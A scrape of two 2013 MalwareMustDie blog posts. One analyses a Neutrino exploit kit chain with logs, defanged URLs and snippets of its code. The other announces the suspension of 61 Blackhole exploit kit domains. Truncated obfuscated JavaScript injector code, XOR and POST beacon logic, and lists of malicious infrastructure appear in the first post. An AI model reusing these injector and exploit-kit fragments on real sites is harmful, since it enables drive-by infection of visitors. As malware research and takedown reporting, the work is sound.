Quantcast
Channel: Malware Must Die!
Viewing all 151 articles
Browse latest View live

Knockin' on Neutrino Exploit Kit's door.. Part-1 (where is "that" PluginDetect 0.8.0 ??)

June 24, 2013, 7:24 am
$
0
0

Summary of infection chains

This is going to be a long writing, but the weekdays has been started.. so does the daily work and they go first in #MalwareMustDie, NPO rules, so please allow me to split this post into two parts, this is the important part..

Found this EK in the progress of infection; URI reference, landing page & malicious obfuscation code used are showing Neutrino Exploit Kit traces, but there are slight changes compares previous findings posted by fellow researchers in here and there, so maybe it's a different or newest variant.

By the time I spotted this, it was a fresh on-growing threat and started to build infection chains. I can't just sit and watch nor just play with it, so as a quick act to stop this (which is a must) I dare myself to make malicious verdict post for the shutdown reference purpose. Please help to push this threat's shutdown ASAP, don't wait for the research's pace (with thank's in advance).

First, let's get straight to summary of infection as per below written table.
PS: Believe me that all of the information below is worth to block the threat, and NO! this is never be a good/legit mechanism, must be a malicious scheme, so don't waste your time in wondering, grab the sample we grabbed as per attached and see it yourself (quicker).

EK Functions IP Address URL
Redirector 74.53.108.147 h00p://www.webapps4hotels.com/?wps=2
TDS/Clicker 81.88.48.79 h00p://bizkaikopirenaika.com/clicker.php
Landing Page 178.17.169.199 h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
PluginDetect File 178.17.169.199 h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js
Payload/Infector URL 178.17.169.199 h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371

Neutrino EK is up in 178.17.169.199 in Moldova, Europe and serves random multiple domains infector as per below (we are requesting the shutting down for these malicious act at this moment), which is partially based on shared DNS service:

1. xxx.dnsdojo.com 

mlviwwiokblfqj.dnsdojo.com
mocqrrrnqxeuyejthn.dnsdojo.com
hdpbdwndymbtrsvxship.dnsdojo.net
youbljtwmqfpggrest.dnsdojo.net
pxwkcdewyrqu.dnsdojo.net
kmevvwtioxwu.dnsdojo.net
  :
2. xxx.selfip.biz 
ilustyewwwiec.selfip.biz
pporvwwsrqfwqdiiqvj.selfip.biz
ifwutmgywlrno.selfip.biz
hxlswcwsyodq.selfip.biz
mqydnjycdjmpdqhs.selfip.biz
wqkcrphwlxv.selfip.biz
fwklleuqdogcmhxtirw.selfip.biz
  :
3. xxx.worse-than.tv 
45400f3233e52d15694cf990.worse-than.tv
26745522c585519482f0e3e3.worse-than.tv
d22a34203ed4dc4571e361de.worse-than.tv
  :
4. xxx.does-it.net 
brmvcfvtplecyqryixyv.does-it.net
plmomkgpxxej.does-it.net
  :

While the TDS service used is in IP: 81.88.48.79 in Italy, which also a shared dynamic DNS domains/service as per below: 

onlinux-es.setupdns.net
Which is involving huge possibility of domains as malware infector, list is -->>[HERE]

Addionally the redirector used shared domains spotted in IP: 74.53.108.147 on Houston, Texas, of ISP/domain: theplanet.com 

acaville.com.pe
fridgeadvisor.com
thetreadmilladvisor.com
webapps4hotels.com
  :


Neutrino EK's Landing / Infection Analysis

It was started from the redirection url via spam leads to the redirector URL.
By the browser it looks like this:

The download log.. 

--2013-06-24 19:00:11--  h00p://www.webapps4hotels.com/?wps=2
Resolving www.webapps4hotels.com... seconds 0.00, 74.53.108.147
Caching www.webapps4hotels.com => 74.53.108.147
Connecting to www.webapps4hotels.com|74.53.108.147|:80... seconds 0.00, connected.
  :"
GET /?wps=2 HTTP/1.0
Host: www.webapps4hotels.com
HTTP request sent, awaiting response...
 ":
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2013 10:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: h00p://www.webapps4hotels.com/xmlrpc.php
Set-Cookie: PHPSESSID=79a8dc9b2b759b5e987a266ce9991b74; path=/
Set-Cookie: nosqueeze=nosqueeze; expires=Mon, 17-Jun-2013 10:00:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
  :
Length: unspecified [text/html]
Saving to: `index.html'
2013-06-24 19:00:13 (109 KB/s) - `index.html' saved [56700]
You'll see the malicious code right away as per snipped jinxed code: 
<body class="home blog single-author two-column right-sidebar">


<script type="text/javascript" language="javascript" >

                    bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;
ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12
v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval
"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,1
                  [...]
1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];
for(i=2-2;-i+1314!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]
))+0xa-bv);}za=e;za(s)}</script><div id="page" class="hfeed">
<header id="branding" role="banner">
The code explains as per follows..

these variables are the key to rotate the values... 

 sp="spli"+"t";
 w=window;
 ff=String.fromCharCode;
 z="dy";

..and then it writes the body... 

 try
 {
   document["bo"+z]++
 }

..and after it runs , the eval burped... 

   try
   {
     document;
   }
   catch(wb)
   {
     vzs=2;
   }
   if(!vzs)e=w["eval"];
      :

The burped eval value is the hidden IFRAMER with the specific cookie condition:

This is why I got the TDS URL, which I checked as follows:

// TDS trolls...

--2013-06-24 19:31:14--  "h00p://bizkaikopirenaika.com/clicker.php"
Resolving bizkaikopirenaika.com... seconds 0.00, 81.88.48.79
Caching bizkaikopirenaika.com => 81.88.48.79
Connecting to bizkaikopirenaika.com|81.88.48.79|:80... seconds 0.00, connected.
  :"
GET /clicker.php HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
Host: bizkaikopirenaika.com
HTTP request sent, awaiting response...
 ":"
HTTP/1.1 302 Found"
Date: Mon, 24 Jun 2013 10:31:07 GMT
Server: Apache/2.2.14 (Unix)
X-Powered-By: PHP/5.2.5
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Content-Length: 0
Content-Type: text/html
Content-Language: es
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
  :"
302 Found"
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371 [following]
Skipping 0 bytes of body: [] done.
--2013-06-24 19:31:18--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Resolving youbljtwmqfpggrest.dnsdojo.net... seconds 0.00, 178.17.169.199
Caching youbljtwmqfpggrest.dnsdojo.net => 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... seconds 0.00, connected.
  :
GET /afscm?qomseteng=7559371 HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: youbljtwmqfpggrest.dnsdojo.net:8000
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jun 2013 10:31:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.6
  :
200 OK
Length: unspecified [text/html]
Saving to: `afscm@qomseteng=7559371'
2013-06-24 19:31:22 (34.0 MB/s) - `afscm@qomseteng=7559371' saved [2512]
Well, we got the 302 that throwed us to the below url; "the" landing page. 
h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
it will download us the below codes:

if we beautify the javascript part, which is the core of this infection and main verdict of the malicious act, you'll recognize it as the part of plugin detect codes to detect the plugin & etc components of your browsers, for the exploitation purpose:

For your reference, the full code of the landing page I beautified it here -->>[MMD PAstebin]
As you can see in the code, different from the previous Neutrino EK landing codes, it doesn't plainly mentioning the "host-id" or "password" used but now they hide it to be generated via below logic: 
 JSON.stringify=JSON.stringify||function(a)
 {
   var c=typeof a;
   if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
   var d,b,e=[],f=a&&a.constructor==Array;
   for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")};

Back to the downloaded code (the Neutrino EK's landing page), it has so many links to .js and .css files, don't waste your time on these garbage, yes I checked them all, i.e. the .js files are below: 

// below are the .js files..
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
...yup, to be sure I downloaded them all.. 
--2013-06-24 19:46:20--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/.js
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `wgyesrof.js'
2013-06-24 19:46:23 (923 KB/s) - `wgyesrof.js' saved [118]
Saving to: `vuofg.js'
2013-06-24 19:46:51 (6.50 MB/s) - `vuofg.js' saved [181]
Saving to: `cqqv.js'
2013-06-24 19:47:06 (5.96 MB/s) - `cqqv.js' saved [178]
Saving to: `cnvpce.js'
2013-06-24 19:47:23 (866 KB/s) - `cnvpce.js' saved [29]
Saving to: `aqrwwpb.js'
2013-06-24 19:47:41 (677 KB/s) - `aqrwwpb.js' saved [24]
Saving to: `hptkkoyqvzt.js'
2013-06-24 19:47:58 (4.85 MB/s) - `hptkkoyqvzt.js' saved [182]
Saving to: `ppkuryqha.js'
2013-06-24 19:49:07 (1.83 MB/s) - `ppkuryqha.js' saved [107]
Saving to: `blgxhwyvdop.js'
2013-06-24 19:49:27 (360 KB/s) - `blgxhwyvdop.js' saved [10]
Saving to: `zenpzmilbxv.js'
2013-06-24 19:49:47 (4.85 MB/s) - `zenpzmilbxv.js' saved [135]
Saving to: `oumvvhkwsruznt.js'
2013-06-24 19:50:12 (154 KB/s) - `oumvvhkwsruznt.js' saved [21]
Saving to: `rhkggotwoffagc.js'
2013-06-24 19:50:32 (1.18 MB/s) - `rhkggotwoffagc.js' saved [37]
Contain crap of strings... 
// the list.. 
"
2013/06/24  19:47    24 aqrwwpb.js        e56eb6406a2ad302e8960c79c27c638b
2013/06/24  19:49    10 blgxhwyvdop.js    3172a382e2d9f1af0ff4242a60b85bc8
2013/06/24  19:47    29 cnvpce.js         d98c8323b16f548cf96efe38c5a18038
2013/06/24  19:47   178 cqqv.js           4a6813af85e9e4a06539b30a598d7054
2013/06/24  19:47   182 hptkkoyqvzt.js    60f725e731ca6431db8a309e35da2f1b
2013/06/24  19:50    21 oumvvhkwsruznt.js d1429317cea14fa84a9583474b1b0b03
2013/06/24  19:49   107 ppkuryqha.js      b801f8e1dc5f7fb40acceea6c70fff2c
2013/06/24  19:50    37 rhkggotwoffagc.js 022488c0ad7f8f038173ba55130b03c7
2013/06/24  19:46   181 vuofg.js          dfab72d0ed8c9b4cf56b7dccf2cb3484
2013/06/24  19:46   118 wgyesrof.js       0b6057183dcedf3d275d3dc6ee4131fa
2013/06/24  19:49   135 zenpzmilbxv.js    8a29661c15b5940a4744576b291d1078
"
// assemble the codes...to find you the garbage...
"
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
"
// cat & merge them all and result is here: 100% pure craps..

// wyczqnfpganiazbntkuycgxhytsxgyidwkcnyidfiqnjqpxkzsjcygjwacugacjxnmlmvordffmwukhucqxbxhyxjsejuohiasuvhmznsmjmwrhziea
// btkdpwixiezptqwfijjrukbbosnwrhosbywqveneintbdqhmzqeubfvpyjmprbiszeivjwarjutnkazjreetjzjhjvxawftwjcssyskindvxevhwzlpjlyqvtnwqspncrfvpygylkujoqqkpczzoypjsdgiwvvzmauczaakkutzkkjanja
// nzsdfulnbeahonomcixycuhxmwqtwxlkxendyzradsirfweifbhhwofilvchsnrqsftqekriczaiveqbfxicmolxjnecbwstbmkgwbozbohxsyyywhbivmffajhcgavhmgojicijrqhkofjknksixxnxhvznvvvibjrjmatdqaofgxq
// ggqkulbvalrssycymsyvfrkwjt
// xticyuzjlqnjbigpundax
// uapgllhhuyojyrzeaxhfbzwwtsgwwhoqhdxsoeajdosbgsggpomrniogbudxbrojumcjqdsurkwydcetrqlezzlaupywgngazjjqmckdmgcqjgjbxufxuryogxlnkrokayamalqmssdczmdxgjvabtpiqavbrjlshmehyvuroxunkxlqhgr
// voxtnlheexmejkkkjoffluwsvaaosrznfwhshpxmmjqvubgepljbggtbhuqzlpnrmukujihwsysmzzqplaqrgktoejoqzbilvsffamct
// hwouuqs
// igmeiwttqzebwsjihxodzsdoljcgbttjzgoichbthgueyemfcbjbunqgxsmylgilnwtpevjmberaiegkfqmzecgbvszgzhsmemcjilwkqnkyrrjwiwwmycntvnauuthzfkjo
// moqehjiffvtfkycywp
// oaqjntbakmsnnjuixihdcquslnvoidsxdi
it goes the same to the all .css files.. 
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/rcijxziqjmwai.css
ejuzjwuujkemwakngquwbriiviazztb
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/ubjabj.css
ylyvjo
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/wqhbu.css
vhrmzrnkvxkvpnnjsrhegmuvxuipgv
   : 
$ peekl h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/pqnojry.css
sxsstxnzjbjt


The PluginDetect 0.8.0

According plugin detection code above in the landing page, there MUST BE! the PluginDetect somewhere. Eager to know which version they use, I checked there is one more .JS worth to check, it is camouflaged under the /script/ directory. So let's fetch it: 

--2013-06-24 20:02:06--  
"h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js"
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41616 (41K) [application/x-javascript]
Saving to: `plg.js'
2013-06-24 20:02:12 (42.4 KB/s) - `plg.js' saved [41616/41616]
Snipped is: 
var PluginDetect={version:"0.8.0",name:"PluginDetect",openTag:...
RegExp(b):this.getNumRegx).exec(a):null;return c?c[0]:null},compar...
"0","0","0"]);for(c=0;4>c;c++)if(/^(0+)(.+)$/.test(d[c])&&(d[c]=Re...
this.$;return a.isIE&&7<=a.verIE?1:0},objectProperty:function(a){v...
!c.test(f))return d[e];return null},getMimeEnabledPlugin:function(...
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installe...
g&&f>g&&"0"!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),"0"!=d[f]))return b;r...
b,c=document,d=a.userAgent||"",e=a.vendor||"",f=a.platform||"",a=a....
c.getElementsByTagName("body")[0]||c.body||null;this.verIE=(this.i...
"")?5:b)||this.verIE;this.verIE=b||this.docModeIE}this.ActiveXEnab...
this.formatNum(RegExp.$1):null;this.verSafari=(this.isSafari=(/App...
this.isArray(a)&&0<a.length&&this.isFunc(a[0]))&&b.push(a)},callAr...
"0");1!=f.getVersionDone&&(f.getVersion(c,d,e),null===f.getVersion...
   :
The beautified code I pasted here--->>[MMD Pastebin]

Below is the list of detection & (malicious) weaponized possibility of this PluginDetect: 

"Quicktime
Java
Flash
Shockwave
Windows Media Player
Silver Light
VideoLAN VLC
Adobe Reader
Real Player
"
Meaning, the exploitation of the above list of softwares are applicable.

The Neutrino EK's PluginDetect is not containing to a direct infection code, which all of the infection code is related to the applet in its landing pages so unlike the blackhole EK or cool EK, it will be no surprise to find Neutrino EK's PluginDetect script is undetectable by virus scanning products: 

URL: https://www.virustotal.com/en/file/4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1/analysis/
SHA256: 4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1
SHA1:  6c15ef7801f35733e89e8df0113866d8a09a5ba6
MD5:  13f62e2903683ec97a25885b05e8bed9
File size:      40.6 KB ( 41616 bytes )
File name:      plg.js
File type:      Text
Tags:           text
Detection ratio: 0 / 47
Analysis date:  2013-06-24 16:19:36 UTC ( 10 hours, 39 minutes ago )


Malicious Exploit Kit Verdict

The supporting verdict to PoC this the landing page as EK’s landing(Neutrino):

1. Attempt to xor and decode the URL: 

$.post(d,f,function(a)
{$("body").append(xor(decodeURIComponent(a),c))
2. Neutrino EK's infector string building logic (to be used by post query later on): 
 for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")
3. The XOR logic itself.. 
function xor(a,c)
 { for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
   return d }
4. Below is the Java exploit infection traces via POST request recorded (still on-checks, the target is keeping on changing too..): 
Query:   POST /bxfkxhcqk HTTP/1.1
host:    h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000
Referer: h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371
This query above was generated by the below logic/code in the landing page: 
[...]
   var f={};
   f[b]=c;
   f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
   $.post(d,f,function(a) {$("body").append(xor(decodeURIComponent(a),c))}
    [...]
5. The camouflage attempt to download PluginDetect 0.8.0
6. The attempt to hide XOR key in var aa, bb, cc
$(document).ready(function()
{ var aa = 'gvwuhd';
  var bb = '';
  var cc = aa;
  bb = cc;
to be stored in the var bb in function's parameter below: 
\u0410\u041d602(
  '51c81ff4aaa2cce42c1809bd',
   bb,
   'bxfkxhcqk',  // <-- this string "params d" goes to the post.. MMD note. 
   'rruqytkegrvjt',
   'eefazbuhfeekpb'   );
For the further to be used in XOR related calls/function in the "c" parameter: 
function \u0410\u041d602(a,c,d,b,e)

To be continued..
(plan: to more break-down the PluginDetect codes, payload details, further infection spreading details..if the EK is still exist later on..)



Additional

A couple of URLQuery result of this part of story--->[1] and [2]
And Virus Total infection check result (pDNS) for the Exploit Kit's IP is here-->>[Virus Total]

Samples and PCAP data is shared for raising the detection ratio and research purpose only:

Download here--->>[MMD Dumps]

Reference

Our friend "Malware Forensic" (link) wrote good analysis on previous version of Neutrino:
(click the number inside the bracket for links)
[-1-] Neutrino Exploit Kit landing page demystified
[-2-] Neutrino Exploit Kit Landing pane change or variation
[-3-] Neutrino Exploit Kit analysis

The great Exploit Kit researcher @kafeine (link) posted Neutrino EK:
[-1-] Hello Neutrino ! (just one more Exploit Kit)
[-2-] CVE-2013-2423 integrating Exploit Kits (Neutrino EK Parts)
[-3-] His tweet on changes spotted in this Exploit Kit:


#MalwareMustDie!

Search

Suspension announce of 61 unique domains used by Blackhole Exploit Kit ("closest" type) Crime Group operated on 80.78.247.114 (Russia)

June 28, 2013, 7:11 pm
$
0
0
MalwareMustDie, NPO, during its research activities, is following the process of suspension malware bad domains as important milestones in malware fighting steps. is also publicly releasing some of suspension domains in the "Operation Tango Down" [What is TangoDown?] as a public announcement.

The current report is a fast and successful suspension process, as a good coordination between members who spotted, analyzed & reported the threat, to our PiCs in Tango Team (thank's to ‏@S with @CL for the hard work) and the related registrars who help us with the GREAT cooperation for the swift follows and banning further registration procedure process (blacklist) accordingly. We have a much better pace in suspending process (less than 18hrs), even right before weekend, as a good lead time reference for future cases.

Following is the report detail, with noted: is not aiming for the analysis details (we have a lot of similar case analysis in our blog already) but more to be a cybercrime-evidence purpose, with all of the materials posted are to be utilized for following legal process.

Verdict of Crime

We detected the very dangerous exploit kit landing page of malware infection via browser's vulnerability exploitation pointed to the below IP/NETWORK: 

"80.78.247.114 / AS43146 Agava Ltd.(Russia  Federation)"
Initially caught in the act using Blackhole Exploit Kit the "/closest/" version operated under below URL: 
"h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
 :"
Furthermore the activity also recorded in Virus total pDNS report:
URL: https://www.virustotal.com/en/ip-address/80.78.247.114/information/
"2013-06-28 18:30:12 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php
2013-06-28 18:26:43 h00p://detectedflights.org/closest/
2013-06-27 21:33:13 h00p://terminalspervasive.biz/
2013-06-27 19:52:24 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262
2013-06-27 19:08:09 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 16:37:32 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 15:38:34 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 15:33:21 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
2013-06-26 19:28:27 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
2013-06-26 00:16:13 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
2013-06-25 22:15:47 h00p://platformvillains.in/closest/hospital-worker.php
2013-06-25 21:40:54 h00p://platformvillains.in/
2013-06-25 21:40:35 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php 
"
And also monitored in the URLQuery:
URL: http://urlquery.net/search.php?q=80.78.247.114&type=string&start=2013-05-01&end=2013-06-29&max=400
"2013-06-28 21:20:51 1 /  0 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-28 16:05:21 0 /  0 h00p://detectedflights.org/closest/ [Russian Federation] 80.78.247.114
2013-06-28 11:20:30 1 /  0 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-28 11:19:03 1 /  0 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 23:33:26 0 /  2 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-27 23:15:52 1 /  0 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 21:49:41 0 /  2 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-27 20:40:27 2 / 13 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:43:31 2 /  6 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:39:28 2 / 21 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:26:24 2 / 15 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 18:49:18 2 / 14 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 15:10:13 2 / 11 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 15:01:50 2 /  9 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:53:14 2 / 14 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:11:13 2 / 49 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:05:27 2 / 54 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 13:08:19 2 / 26 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 10:35:34 2 /  7 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 09:50:03 2 /  7 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 07:08:47 2 / 47 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 01:58:39 2 / 26 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 22:00:39 0 /  0 h00p://samenamedpremium.biz [Russian Federation] 80.78.247.114
2013-06-26 21:28:24 2 / 24 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 20:50:53 0 /  2 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-26 13:57:32 0 /  0 h00p://samenamedpremium.biz [Russian Federation] 80.78.247.114
2013-06-26 13:56:00 0 /  0 h00p://80.78.247.114 [Russian Federation] 80.78.247.114
2013-06-26 04:38:23 0 /  0 h00p://80.78.247.114 [Russian Federation] 80.78.247.114
2013-06-26 04:00:06 2 / 50 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 03:08:24 2 / 24 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 00:21:59 2 / 10 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 23:52:36 2 / 14 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 23:44:57 2 / 23 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 23:28:58 2 / 25 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 22:00:33 2 /  7 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 21:29:13 2 /  9 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 21:27:52 1 /  0 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 18:14:20 2 / 11 h00p://appsandfundamentals.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 18:02:07 1 /  0 h00p://appsandfundamentals.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
"

Exploit Attack Evidence

Some snapshots of the exploit infector used:

is an evidence as per recorded in URLQuery records below: 

"http://urlquery.net/report.php?id=3356618
http://urlquery.net/report.php?id=3356579
http://urlquery.net/report.php?id=3355901
http://urlquery.net/report.php?id=3352167
http://urlquery.net/report.php?id=3332078
  :"

Tango Information

Dismantling detail is, although was spotted 150+ domains under various conditions registered by the same bad actor behind this scheme, we sorted to the 61 unique domains listed below which will be enough to put the related infection out of internet. Sorting was proceed by eliminating the double records, usage of sub-domains, not clearly related/in-verdicted domains. These domains is confirmed down by June 28th, 2013, 23:59(pm) GMT+9. The registrant's used individual ID/credentials is marked and spread to all registrars as blacklist for the further threat's blocking, and also passed to the regional authority for the further legal process.

The suspended malware related domain list is as per below: 

"anotherfactory.biz
artificialwind.asia
automatedpersonal.biz
balloonmansards.biz
blissfullyshare.biz
builtinscrupulous.net
campgroundstexts.biz
challengingprobably.biz
cokelendino.biz
conceptuallynetra.biz
coveringtelex.org
crypticallyhits.biz
delacruse.biz
directorybasedvibration.biz
discontiguousnds.asia
enterprisespumpkin.biz
eulaschalk.biz
examplefeatures.biz
expressionssentrybay.biz
extensivemymagicjackcom.org
fingertipsync.biz
flagsreimagining.biz
forgotperson.biz
fourthdvst.org
garbleddesigns.net
hoodselectable.biz
hourswebdav.biz
humorannouncement.biz
illustrateredeemed.net
joliclouddestructive.net
klockspell.biz
laptophandextremely.biz
lookyouthful.biz
massacrehighesttiered.biz
mediumsizedacdsees.biz
metadataconverse.net
muckinghighres.net
normov.biz
ntjobs.biz
nutsprerelease.biz
obamanizererouting.biz
perdevicecategoryyoursphere.net
pkielements.biz
prohibitedhill.biz
ridspayback.asia
scriptedbecome.biz
smugmugextras.biz
snapfishletnarrator.biz
sparesaddressmanually.biz
specialtyinterpreted.biz
squirrelspremade.biz
staffsenjoyment.biz
subsystemgandhi.biz
subtractionipvcertified.biz
summarysomeplace.biz
technologiesblipping.biz
votingkasperskyequipped.biz
vsmounting.org
webcastingtyping.biz
webworkzoneibm.biz
withinstyrofoam.biz"

